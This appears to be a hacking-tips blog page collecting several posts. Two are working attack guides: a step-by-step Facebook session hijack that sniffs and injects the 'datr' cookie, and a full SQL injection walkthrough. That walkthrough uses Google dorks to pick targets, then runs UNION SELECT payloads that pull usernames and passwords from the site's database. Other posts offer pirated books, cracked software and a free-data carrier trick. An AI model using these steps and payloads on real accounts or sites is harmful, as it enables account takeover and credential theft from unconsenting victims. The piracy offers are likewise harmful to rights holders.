Hacking Facebook accounts using Cookie Stealing and Session Hi-jacking

Warning: This is only for EDUCATIONAL purposes to make you aware of how your FACEBOOK account may get HACKED so that you may PREVENT it from getting hacked,,,,!!!

The person posting this or the this blog is not responsible for any type malicuous activities performed by anyone who is reading this,,,,!!!

Hey there,,,!!! Many of them have been reuesting me to post about FACEBOOK HACKING,,,!!! Well here it is for you,,,!!!

Authentication Cookies used by Facebook :

The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:

datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

An attacker may use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any ***Packet Sniffer*** and gain access to victims account.

If an attacker is on a Switch based network he would use an ***ARP Poisoning*** request to capture authentication cookies, If an attacker is on a wireless network he uses a tool called ***FIRESHEEP*** in order to capture authentication cookie and gain access to victims account.

Here in the example below I will be explaining in simple STEPS how an attacker can capture your authentication cookies and hack into your Facebook account with ***Wireshark***.


Step 1 - First of all download wireshark from the official website and install it.


Step 2 - Next open up wireshark click on analyze and then click on interfaces.


Step 3 - Next choose the appropriate interface and click on start.



Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 - Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the  http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.

Step 7 -  Next right click on it and goto Copy - Bytes - Printable Text only.

Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now open up Facebook.com and make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.

 Step 10 - Now refresh your page and
                                                  *******BINGO***********************You are logged in to the victims facebook account.***************


Now comes the important part,,,,,!!!

HOW TO PROTECT YOUR ACCOUNT ??
Well, the best way to protect yourself against a session hijacking attack is to use  " https:// " connection each and every time you login to any of your accounts in  Facebook, Gmail, Yahoo or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won't be able to do any thing with your cookies.  Also avoid using unwanted apps that you use in FACEBOOK. Keep changing your password freequently. Use tough passwords which  are hard to guess with a combination of uppercase and lowercase characters with symbols in between to make the password very strong.

 Hope you ENJOYED this post,,,!!! Please do bookmark and share if you liked this post,,,!!! Cheers,,,,!!!

Read more »

***HACKING EXPOSED*** E-BOOKS FREE DOWNLOAD,,,,,!!!

Hey guyzzz hope you are having great fun learning HACKING,,,,!!! Here is a series of  4 books on HACKING EXPOSED series that sure will
 help you out,,,,!!!

CLICK HERE TO DOWNLOAD "Hacking Exposed - Web Applications"

 

Joel Scambray, "Hacking Exposed - Web Applications"

Publisher: McGraw-Hill | ISBN: 007222438X | edition 2002 | PDF | 416 pages | 12.9 mb

CLICK HERE TO DOWNLOAD "Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions"

Andrew A. Vladimirov, "Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions" Publisher: McGraw-Hill Osborne | ISBN: 0072259175 | edition 2006 | CHM | 400 pages | 10.8 mb

CLICK HERE TO DOWNLOAD "HACKING EXPOSED: Malware and Rootkits"

Hacking Exposed: Malware & Rootkits Secrets & Solutions By Michael Davis, Sean Bodmer, Aaron LeMastersPublisher: Mc//Gra//w-H//ill 2009 | 400 Pages | ISBN: 0071591184 | PDF | 11 MB

CLICK HERE TO DOWNLOAD "Hacking Exposed 5th Edition: Network Security Secrets And Solutions"

Stuart McClure, "Hacking Exposed 5th Edition: Network Security Secrets And Solutions" Publisher: McGraw-Hill Osborne Media | ISBN: 0072260815 | edition 2005 | CHM | 692 pages | 18.5 mb

 DOWNLOAD AND ENJOY,,,!!! HAPPY HACKING,,,!!!



Read more »

Airtel GPRS TRICKS AT ZERO BALANCE

APN: airtelgprs.com
Proxy: 85.31.186.21
Port: 80
Home Page: 0.facebook.com



I will keep updating this post with the latest proxies and other tricks,,,,!!!  Cheers,,,,!!!

Read more »

FREE DOWNLOAD- 1000 Hack Tutorials

Hi Friends,,,,,!!! I have decided to give another  book on Hacking for FREE as a CHRISTMAS GIFT to you all,,,,!!! Enjoy,,,!!!





TO DOWNLOAD THIS BOOK CLICK HERE.

Wishing You All an Merry Christmas and a Happy New Year in Advance,,,,!!! Enjoy,,,,!!! CHEERS,,,,!!!

Read more »

FREE INTERNET DOWNLOAD MANAGER(IDM) 6.07 Build- Fully Cracked

After my previous post on  How to Download Any Torrent File Using IDM I thought of giving away the IDM Software for FREE for those who still dont have one,,,,!!!

Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.

CLICK HERE TO DOWNLOAD.



 

Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads.

CLICK HERE TO DOWNLOAD IDM 6.07 BUILD

Enjoy,,,,!!! Cheers,,,,!!!

Read more »

How to Download Any Torrent File Using IDM

Though you may have high speed internet connection it still happens sometimes that you are not getting good downloading speeds. Here is the solution for this problem where you can use everyones favourite IDM(Internet Download Manager) to download them. There are many methods on the internet to do this,,, but this is the easiest, simplest and tested method.
This Eliminates the dependency of the seeders, leechers, internet connection,,,,!!

Here are the 5 Rock and Roll steps ;) Enjoy,,,!!!

Step 1:

First of all , you have to download the torrent file (.torrent) which you want to download.

Step 2:

Now go to Torcache and upload the torrent file that you have just downloaded and click on the cache! button.








Step 3:
This will give you a new torrent file. You just have to copy the link of the new torrent file from the opened window.


Step 4:

Then go to the Torrific website and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on "Get" button.




Step 5:

Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and YEAH,,,,!!! :D now you can see the download manager-IDM popping out for downloading the file.

Now enjoy the Ultimate Speed of IDM for downloading torrents to,,,!!! Hope you liked this post,,,,!!! Cheers,,,!!! :)

Read more »

Easy Steps to Change your IP in less than a minute,,,!!!

Here is the 10 most easy quick step method to change the IP address by changing the properties in LAN (Local Area Netwok).

Step 1:
Click on "Start"---> "Run"
Then Type in "command" or "cmd" and hit OK or press ENTER.

Step 2:

In the Command Prompt also known as "MS-DOS" prompt just type "ipconfig /release" & Hit Enter.

Type "exit" and leave the
prompt

Step3 :
Right-click on "Network Places" or "My Network Places" ---> Click on "properties" .Then Right click on "Local Area Connection"--->Click
"properties"

Step 4:
Now click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab

Step 5: Click on "Use the following IP address" under the "General" tab
BINGOOO,,,,!!! Now you can type in your own IP address .

Step 6:

Now Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

Step 7:
Hit the "Ok" button twice and you are now back to the "Local Area
Connection" screen.
Step 8:
Now Right-click back on "Local Area Connection" and go to properties again.

Step 9:
Go back to the "TCP/IP" settings
Now , Select "Obtain an IP address automatically"
Step 10:
Hit "Ok" twice again

BANG BANG BANG,,,,,!!!! :D ;)
You now have a new IP address However it only changes your
dynamic IP address and not not your ISP/IP address.

Hope you enjoyed this post,,,!!! Cheers,,,!!! ;)

Read more »

HACKING WEBSITES USING SQL INJECTION ATTACKS ON VULNERABLE SITES,,,!!!

Warning: This is only for EDUCATIONAL purposes to make you aware of the vulnerabilities that may be present in your website so that you may self test it in your OWNED website to IMPROVE the SECURITY ,,,,,!!! The person posting this or the this blog is not responsible for any type malicuous activities performed by anyone else,,,,!!!

This is what they basically teach you when you go for certain HACKING COURSES which I have taken pains for hours to put this to you without even earning a penny and sharing it for FREE,,,,!!! Atleast some comments and feedback from you will make me Happy ^_^

So Guyzzz I have now decided to post some serious ADVANCED LEVEL OF Hacking stuffs which is how the "Cracker" breaks into your Vulnerable Websites,,,,!!!
All you need to know is a bit of SQL queries,,,!!!
It doesnt matter even if you are not an expert in
So here we go,,,

What is SQL Injection?
So let me give you some idea of what I am going to talk about,,,,There are many complex defenitions you may get in various other sites,,, But I put it in simple terms,,,, You type some SQL queries or codes [or whatever you wish to call it ;D] on the address bar[whee you type the web address of sites to be searched] to test vulnerable website,,,,!!! If you find it vulnerable then BINGO,,,!!! we will use some more SQL injection queries to crack it,,,!!!

So guyzzz who are related to computer science stream,,, If you found learning SQL boring this is one way to make yourself interested in ;D

And as far as others are concerned,,, please dont worry i'will be giving you some codes which you may use to Test the Vulnerability of the site,,,!!!

QUICK STEPS TO FIND THE VULNERABILITY OF WEBSITES,,,!!!
Step 1:
Search for any of the following terms in Google:

inurl:product.php?id=

inurl:index.php?id=

inurl:news.php?id=

inurl:shop.php?id=

inurl:shop.php?pid=

inurl:newsroom.php?id=

Step 2: Now for example say there is a website that you found in Google search say for example
www.rahulswebsite.com/index.php?id=7
Open the website in a new tab,,,!!!

Step 3:
To test if your selected website is vulnerable:
Add the ' (single quote symbol) after the site as follows
www.rahulswebsite.com/index.php?id=7'
and now Hit the "Enter" Key,,,!!!

If there is any type of "MySQL error" !!!BINGO,,,!!!
Then it means your target website is vulnerable.

STEPS TO HACK INTO THE WEBSITE AFTER FINDING THE VULNERABILITY

Step 1:
After finding the vulnerability of your target site, use the ORDER BY command to extract the number of columns in the database.
Ex Code:
http://www.anywebsite.com/index.php?id=7 ORDER BY 1--

Doing ORDER BY 1-- should always return the original page with NO error.

Step 2:

Then do ORDER BY 2--

If this shows the original page with NO error, continue.

Now try ORDER BY 3--
and so on,
If this shows the original page with NO error, continue.

Step 4:

Continue increasing the ORDER BY number until you reach an error. For example, if doing ORDER BY 10-- returns an error, then there is a table which has NINE (9) columns, NOT 10. Always subtract ONE from the number that produced the error.

STEP 5:
Next step is to use UNION & SELECT

After getting the number of columns, let's say we have NINE columns. Then you have to type the following code:


Code:

http://www.anywebsite.com/index.php?id=7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--

You should see a page with a few numbers scattered throughout it. If so, continue,
IF NOT, try the following in which we have to add the " - "hypen or negative sign in front of the id value of our website:

Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--

At the end if this produces the scattered numbers, continue, if not, STOP!!!
Choose anyother target website from the GOOGLE search and repeat the vulnerability test,,,!!!

Step 6:

Now we use the database() command

After you see the scattered numbers, pick one to exploit. Say the numbers on my page are TWO and SEVEN. I will choose the number TWO. After choosing your number, put database() in place of it in your URL as shown below. REMEMBER, I chose number TWO.

Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--

That should return some text in place of the scattered TWO. WRITE THIS TEXT DOWN, and move on.

Step 7: We use group_concat

This is where everything gets a little trickier! This is also the part where you will be extracting data. Yeah! Bingoo!!! :D :D *** Fist punch ***

After extracting the name of the database using database(), type this where you typed database() in the previous step.


Code:
http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--

TYPE THIS EXACTLY AS IT IS SHOWN, and press enter.

In place of the scattered TWO, you should see a LOT of text separated by commas. These are called tables. The text varies by website, but you usually want to look for things like "admin," "staff," or "users." Choose the one that interests you. For this tutorial, I will choose "users." Now type this:


Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()--

OR

if you want the columns from ONLY one table, use this (courtesy of dR..EviL):


Code:

http://www.anywebsite.com/index.php?id=-7UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=< table name goes here in hex or ascii format >--

This should return even more text. These are called columns. Again choose what interests you, but for this tutorial, I will choose "username" and "password."
The columns "username" and "password" contain the data we want to extract. To extract the final data, meaning, in this case, the usernames and passwords of all the users, type this:

Code:

http://www.anywebsite.com/index.php?id=-7 UNION ALL SELECT 1,group_concat(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from users--

Where it says "username,0x3a,password,0x3a" is where you would the name of your chosen COLUMNS, such as username and password, DO NOT replace the 0x3a, ONLY the username and password area. Where it says "from users--," replace "users" with the name of your chosen table such as the one "users." All of this will produce even MORE text in this format:

Code:
admin:thisismypass:,
The comma separates each set of data.

THE END OF MY TUTORIAL
HOPE YOU LIKED IT CHEERS :) :) :)

Read more »

Easy way to Change Windows7 Log-On Screen Back Ground,,,,!!!

I have previously described in Detail how to Change the Log-On Screen Background in Windows 7 ,,,, To View my previous post Click Here



Here is yet another quick Step method for the class of lazy guyzzz who hate reading long posts like me ;D

If you do not like the Windows 7 login screen, you can change it as shown above by trying this simple hack.
Here is how you can do it.

1. Launch the Windows Registry Editor by typing Regedit in Start Menu

2. Go to ‘HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Authentication\Log ​​onUI\Background‘.

3. Double-click the DWORD value called ‘OEM Background’ to open it and enter 1 in the Value data field.

Note: If the DWORD ‘OEM Background’ is not there, you need to make it.

4. Browse to the background image that you would like
use on the log-in screen. A JPEG file that is less than 245 kb in size can only be used here.
5. Copy the image you want to use into the ‘%windir%\system32\oobe\info\backgrounds‘ folder. If the folder is not present, you need to create it.

6. Rename the image to backgroundDefault.jpg

7. Restart your computer to check the new login background screen.

BINGO,,,!!! :)

Read more »

Reduce the delay time of Windows 7 thumbnail preview

Windows 7 users know that thumbnail preview of taskbar items is a very cool feature.
You can view the thumbnail by hovering the mouse over the respective taskbar item.
However, you may notice that sometimes, the previews do not appear quickly.
Here is a hack to fix the taskbar preview delay time.

1. Launch Windows Registry Editor by typing regedit in Start Menu

2. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

3. Right click in the right-hand pane of Windows Registry and select New -> DWORD Value.

4. You need to name the new DWORD as “ExtendedUIHoverTime”

5. Double-click on the created DWORD to open it.

6. Select “Decimal” under “Base” and enter the delay time (in milliseconds) in the “Value data” field.

7. Click OK

Read more »